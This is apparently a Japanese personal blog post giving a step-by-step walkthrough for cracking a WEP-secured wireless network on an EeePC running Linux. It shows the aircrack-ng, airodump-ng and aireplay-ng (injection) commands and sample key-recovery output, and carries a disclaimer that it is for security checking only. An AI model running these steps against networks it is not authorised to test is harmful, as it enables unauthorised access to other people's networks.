100円パソコンで無線LANハッキング
EeePC100円パソコン
無線LANハッキング
ハッキングなんて
タイトル付けると大げさだが、
ただ鍵をかけてる
無線LANに侵入するだけ。
方法も至って簡単。
先日買ったEeePCに
Linuxを入れて、
aircrack-ptw でWEP解析するだけ。
Linux初心者の私でもできる、
凄くタイトル負け(´・ω・) ス
■セキュリティのために書いているので、
■実際に他人の電波でやると法律に触れます。
■あくまで、セキュリティの確認で行ってください。
多分、サーバー管理者ならセキュリティの為に、
実際に少し前から、airsort(だっけかな?)airsnort 辺りから試してるとは思う。
恥を忍んで備忘記録のために手順を記述。
誰かの手助けになれば嬉しい(´・ω・) ス
■まずは、linux(eeeubuntu)を入れたEeePC701を用意。
09/3/2 追記:
701 4G-XはAtheros/ARxxxx だと思うけど、
701SD-X → Realtechとかの模様??
すまん・・実機確認してないです。
■aircrack-ngをインストール。
上のメニューから[システム]→[Synapticパッケージマネージャー]を起動し、
検索で、aircrack と検索します。
私の場合、どういう訳か、そのまま入れる事ができなかったので、
ダウンロードだけして、端末でインストール。
■aircrack-ptwを入れる。
アプリケーションから[アクセサリ]→[端末]でターミナルを開く
cd /usr/local/src
wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz
tar -zxvf aircrack-ptw-1.0.0.tar.gz
cd aircrack-ptw-1.0.0
make
make install
cp aircrack-ptw /usr/bin/
http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz
のURLでなぜか数回404出される。一応ブラウザでデレクトリーを削って、
叩いてコピーしてみる事を推奨。(・・・たまたまかな?)
○ちとハマル
この後に端末で、NICをモニターモードにする手順があるけど、
((airmon-ngで確認の際
なぜかモニターモードにならなかった。
私と同じような初心もたまに要る模様。
wifi0 Atheros
madwifi-ng/usr/sbin/airmon-ng: 294: wlanconfig: not found
ググると同じような初心者を発見。
http://forum.cc-team.org/viewtopic.php?p=73066
↓迷走開始//----------------------------------------------
↓ wlanconfigが無い・・。
↓ wlanconfig ath0 create wlandev wifi0 wlanmode managed
↓ とかしないとまずいのか?
↓ VAPがないという事は、作らないとまずいのか・・。
↓--------------------------------------------------------
↓
結局 madwifiのドライバーで解決
sudo apt-get update
sudo apt-get install build-essential
wget http://snapshots.madwifi.org/madwifi-hal-0.10.5.6-current.tar.gz
tar zxvf madwifi-hal-0.10.5.6-current.tar.gz
cd madwifi-hal-0.10.5.6-(イントール時に番号(´・ω・) スね )
make clean
make
sudo make install
sudo reboot
■NICの状態を確認
iwconfig で状態確認
VAPを追加するか、一度ath0を無効にしてwifi0をスタートさせる。
※VAPを追加したら、どうい訳かNIC認識が変になったので、上記の方法。
※数回試しても問題がなければ、OSから再度検証。
airmon-ng stop ath0
airmon-ng start wifi0
airmon-ng ←モニターモードか確認
■近くのワイヤレスLANのサーチ
airodump-ng ath0
■ターゲットAPのパケットの受信
aireplay-ng -1 ★何秒毎 -a ★ターゲットAPのBSSID -h ★NICのMACアドレス -e ★ターゲットAPのESSID> <使用するNIC>」
aireplay-ng -1 0 -a ターゲットAPのXX:XX:XX:XX:XX:XX -h MM:MM:MM:MM:MM:MM -e ESSID ath0
aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX -h MM:MM:MM:MM:MM:MM -e ESSID ath0
ここでBSSID = Basic Service Set Identifier。無線LANアクセスポイントの識別子。通常MACアドレス。
ESSID = 無線LANネットワークの識別子。いわゆるESSID。
【参照】mtanaka氏
http://d.hatena.ne.jp/mtanaka/20081026/p1
■パケット受信記録をファイルに書き出す。
airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w 書き出すファイル名 ath0
※指定しなければrootになるけど、消すの面倒なら、適度にパスも。
※何かのエラーで上記 1 が違うチャネルなら、iwconfig ~でチャンネル変更
■強制的にパケットを発射させる。
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h MM:MM:MM:MM:MM:MM ath0
■解析開始
aircrack-ptw 書き出すファイル名.cap
allocationg a new table
bssid = XX:XX:XX:XX:XX:XX keyindex=0
stats for bssid XX:XX:XX:XX:XX:XX keyindex=0 packet=27335
Found key with len 05: xx xx xx xx xx ←WEBのパスワード。
パスワードはHEX形式で表示される
このマシン語みたいな、HEX・・・変換しないとまずいのか。
ん~・・・・((後日記載